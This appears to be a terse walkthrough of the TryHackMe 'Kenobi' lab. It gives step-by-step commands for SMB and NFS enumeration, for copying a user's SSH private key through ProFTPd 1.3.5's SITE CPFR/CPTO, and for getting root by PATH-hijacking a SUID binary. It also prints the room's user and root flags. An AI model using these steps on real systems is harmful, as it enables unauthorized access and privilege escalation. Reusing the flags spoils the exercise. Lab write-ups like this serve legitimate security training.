Kenobi

#Task 1 Deploy the vulnerable machine 
Scan the machine with nmap, how many ports are open?
hint: nmap -sV -sC -Pn -vv $ip
7


#Task 2 Enumerating Samba for shares 
nmap -p 445 --script=smb-enum* MACHINE_IP
- Using the nmap command above, how many shares have been found?
3

smbclient //<ip>/anonymous
- Once you're connected, list the files on the share. What is the file can you see?
log.txt

You can recursively download the SMB share too. Submit the username and password as nothing.
smbget -R smb://<ip>/anonymous

What port is FTP running on?
21

nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount MACHINE_IP
- What mount can we see?
/var


#Task 3 Gain initial access with ProFtpd 
- What is the version?
hint: nmap -sV -sC -Pn -vv $IP
1.3.5

- How many exploits are there for the ProFTPd running?
hint:searchsploit ProFTPd 1.3.5
3


- What is Kenobi's user flag (/home/kenobi/user.txt)?
hint: nc $IP 21
site CPFR /home/kenobi/.ssh/id_rsa
site CPTO /var/tmp/id_rsa
mykali:
mkdir /mnt/kenobiNFS
mount machine_ip:/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
cp /mnt/kenobiNFS/tmp/id_rsa /tmp
cd /tmp
sudo ssh -i id_rsa kenobi@$IP
d0b0f3f53b6caa532a83915e19224899



#Task 4 Privilege Escalation with Path Variable Manipulation 
- What file looks particularly out of the ordinary? 
find / -perm -u=s -type f 2>/dev/null
/usr/bin/menu

- Run the binary, how many options appear?
hint: /usr/bin/menu
3

- What is the root flag (/root/root.txt)?
hint:
strings /usr/bin/menu
1 curl -I localhost
2 uname -r
3 ifconfig
cd /tmp
kenobi@kenobi:/tmp$ echo /bin/sh > uname
kenobi@kenobi:/tmp$ chmod 777 uname 
kenobi@kenobi:/tmp$ export PATH=/tmp:$PATH
kenobi@kenobi:/tmp$ /usr/bin/menu
2
id
cat /root/root.txt
177b3cd8562289f37382721c28381f02

https://tryhackme.com/room/kenobi
https://ratiros01.medium.com/tryhackme-kenobi-36106cc57abe